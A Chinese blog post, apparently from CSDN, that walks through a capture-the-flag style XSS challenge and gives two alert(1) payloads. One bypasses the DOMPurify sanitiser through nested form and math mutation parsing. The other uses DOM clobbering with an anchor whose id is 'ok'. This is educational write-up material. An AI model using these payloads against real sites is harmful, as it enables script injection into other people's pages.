Ok, Boomer

最新推荐文章于 2024-11-08 16:09:18 发布
最新推荐文章于 2024-11-08 16:09:18 发布
阅读量221 收藏 3
点赞数 3
分类专栏: XSS Game 文章标签: javascript 开发语言 ecmascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/thewei666/article/details/141288241
版权

目录

一、题目

二、思路

三、payload

3.1 方案一

3.2 方案二

 四、思考与总结

一、题目

<!-- Challenge -->
<h2 id="boomer">Ok, Boomer.</h2>
<script>
    boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
    setTimeout(ok, 2000)
</script>

二、思路

DOMPurify是一个流行的JavaScript库,用于防止XSS攻击。该库由一个世界著名安全团队cure53维护,原理是利用白名单,将非白名单内的属性和标签全部过滤。

所以思路主体分为两类,要不绕过要不bypass

思路一:绕过,通过嵌套form循环的错误解析

思路二:DOM Clobbering

三、payload

3.1 方案一

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

3.2 方案二

<a id="ok" href="javascript:alert(1)">

需要将题目中的Javascript:换成DOMPurify库中白名单(tel),因为并没有绕过它,所以直接使用Javascript:会被过滤

 四、思考与总结

DOMPurity的绕过,关键点在于它返回的序列化HTML不符合HTML规范,包含了嵌套FORM元素,所以导致浏览器解析出的DOM树是错误的,img标签直接创建在HTML空间中

DOM Clobbering的重点,在于对“ok”的覆盖,a标签的toString方法是不继承于父类的,它返回的值是href属性。所以直接href属性中编写执行函数即可,但是由于没有绕过DOMPruity,因此使用的协议需要是在它的白名单内。

魏大橙
关注
专栏目录
2022年必备的加密行业术语大全,你了解有多少?
02-20 1222
2021 年出现了一些新的技术流行语,以反映不断变化的技术场景。以下是今年出现的一些词及其含义。 艺术品 NFT NFT 被柯林斯词典评为 2021 年的年度词汇。 NFT 是证明您拥有数字项目的证书,可以是视频、推文或模因的原始版本。它们可以是任何数字化的东西,但很多令人兴奋的地方都围绕着数字艺术。 他们通过在称为区块链的数字分类账中记录详细信息来确认物品的所有权,该分类账是公开的并存储在互联网上的计算机上,使其不可能丢失或销毁。 元宇宙 在 Facebook 将其母公司更名为 Meta,在虚拟世界中展示
Locust性能评测及优化详解
上帝De助手
07-21 6314
文章目录Locust性能评测及优化详解性能评测环境准备1、压测环境准备2、服务环境准备3、压测工具准备压测开始LocustJmeterabhttp_load压测说明性能优化Locust优化项测试Locust默认是否为keep-alive替换为urllib3实现client替换为socket实现client替换为go实现client总结 Locust性能评测及优化详解 这篇文章是用来补前一篇文章挖...
OK Boomer
知屋安砖
07-14 254
OK Boomer示例HTMLCSSJS 更多有趣示例 尽在小红砖社区 示例 HTML #wrap -3.times do .cube .front %h1{"data-splitting" => "chars"} OKBO .left %h1{"data-splitting" => "chars"} OMER .right %h1{"data-splitting" => "chars"} OMER .b
OK BOOMER
weixin_63264424的博客
08-18 196
1.DOMPurity的绕过,关键点在于它返回的序列化HTML不符合HTML规范,包含了嵌套FORM元素,所以导致浏览器解析出的DOM树是错误的,img标签直接创建在HTML空间中2.DOM Clobbering的重点,在于对“ok”的覆盖,a标签的toString方法是不继承于父类的,它返回的值是href属性。所以直接href属性中编写执行函数即可,但是由于没有绕过DOMPruity,因此使用的协议需要是在它的白名单内。
ok,boomer xss的dom破坏
xiaomi11133的博客
08-21 503
通过构造与setTimeout函数参数名相同的标签id,浏览器执行setTimeout函数时会查找HTML中id=ok的字符串类型的标签,而标签被调用时回一个表示标签的字符串即href属性中的值,因此setTimeout函数执行时会将标签中href属性的值tel:alert(1)当作代码来执行,利用该框架中白名单函数tel来执行。在HTML中,如果使用一些特定的属性名(id、name)给DOM元素命名,这些属性会在全局作用域中创建同名的全局变量,指向对应的DOM元素。
【locust】使用locust + boomer实现对接口的压测
weixin_30695195的博客
09-05 1539
背景 很早之前,考虑单机执行能力,使用locust做过公司短信网关的压测工作,后来发现了一个golang版本的locust,性能是python版本的5到10倍以上,但是一直没有机会使用。 最近公司想做一个性能测试平台,技术选型要求和开发语言一致,即golang,所以我想到了boomer,本文为boomer的使用记录。 环境安装 开发环境 安装 Python 3.7 略 ...
xss.pwnfunction-OkBoomer
weixin_63750160的博客
04-10 419
调用0k会直接调用tostring方法获得href里的内容而setTimeout第一个参数恰巧可以接收字符串。这里tel是dompurify框架的白名单。但是href必须是协议:主机名。
Boomer压测环境搭建(Windows)
Ho_mj的专栏
11-03 1686
python3.6 + locust 2.4.1 (Windows) 安装Python3.6, 压测工具: Loadrunner(付费) 、 Jmeter(配置方便)、 locust(更灵活,Python) 、 boomer (go实现locust的slave) 1. pip install 下载安装包的时候,镜像源是国外的, --timeout=200 设置超时时间,默认是15s --timeout <sec> Set the socket timeo...
prometheus函数_具有prometheus适配器的自动缩放无核函数
weixin_26716079的博客
10-09 468
prometheus函数As a part of the web ecosystem, our main concern is how to create an application that handles more, many more requests and how to keep it afloat. Am I wrong?作为网络生态系统的一部分,我们的主要关注点是如何创建一个处理更...
Ok, Boomer.md
11-07
Ok, Boomer.md
DOMPurify XSS绕过探索:Ok, Boomer
"Ok, Boomer.md" 这篇内容讨论的是关于Web安全中的XSS(跨站脚本攻击)绕过策略,特别是针对DOMPurify这个知名的JavaScript库的防御措施。DOMPurify是一个用于清洗不安全的HTML、SVG或MathML内容的库,它的主要目的...
Android提供的系统服务之--SmsManager(短信管理器)
代码拾荒者
01-12 1213
Android提供的系统服务之--SmsManager(短信管理器)                                                                      --转载请注明出处:coder-pig SmsManager相关介绍以及使用图解: 当然为了方便各位,把代码粘一粘吧,就不用麻烦大
Echarts 折线图
weixin_44443380的博客
11-08 61
解决方法:设置emphasis.lineStyle和折线图本身lineStyle相同即可。问题:鼠标悬停在折线图上,折线变粗。3、去掉 hover 折线变粗方法。
vue2面试题5|[2024-11-08]
最新发布
m0_49474690的博客
11-08 271
关于vue2API的面试题
每天10个vue面试题(九)
不熬夜的臭宝的博客
11-08 395
一天10个vue面试题喽!
软件测试学习笔记丨Vue常用指令-条件渲染(v-if)
ceshiren_com的博客
11-05 585
v-show只是简单控制dom元素的display属性。v-if通过操纵dom元素来进行切换显示。
上门理发系统的搭建
app830的博客
11-07 341
上门理发系统的搭建涉及多个方面,包括技术架构、功能模块、用户体验以及运营策略等。服务器:部署应用到云服务器(如AWS、阿里云)或本地服务器上,确保系统的稳定性和可扩展性。消息通知:通过短信、邮件或APP推送等方式,向用户发送预约确认、提醒等消息。订单管理:用户可以查看自己的预约订单,包括待付款、已付款、已完成等状态。服务浏览与选择:展示各类理发服务,包括价格、时长、适用人群等信息。在搭建过程中,要确保系统的安全性和稳定性,防止数据泄露和系统崩溃。操作便捷:优化用户操作流程,减少不必要的步骤,提高用户体验。
安利一款开源企业级的报表系统SpringReport
luck332的专栏
11-04 771
SpringReport是一款企业级的报表系统,支持在线设计报表,并绑定动态数据源,无需写代码即可快速生成想要的报表,可以支持excel报表和word报表两种格式,同时还可以支持excel多人协同编辑,后续考虑实现大屏设计器功能,通过简单的设计器可以生成炫酷的大屏效果。
Electron + Vue3 开发桌面应用+附源码
m0_47483157的博客
11-08 366
Electron 是一个使用 JavaScript、HTML 和 CSS 构建跨平台桌面应用程序的框架。它由 GitHub 开发并维护,允许开发者使用现代 Web 技术创建原生应用程序。Electron 结合了 Chromium 渲染引擎和 Node.js 运行时环境,使得开发者可以在同一个项目中同时利用前端和后端的技术栈。Electron 主要特点跨平台:一次编写,可在 Windows、macOS 和 Linux 上运行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

魏大橙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值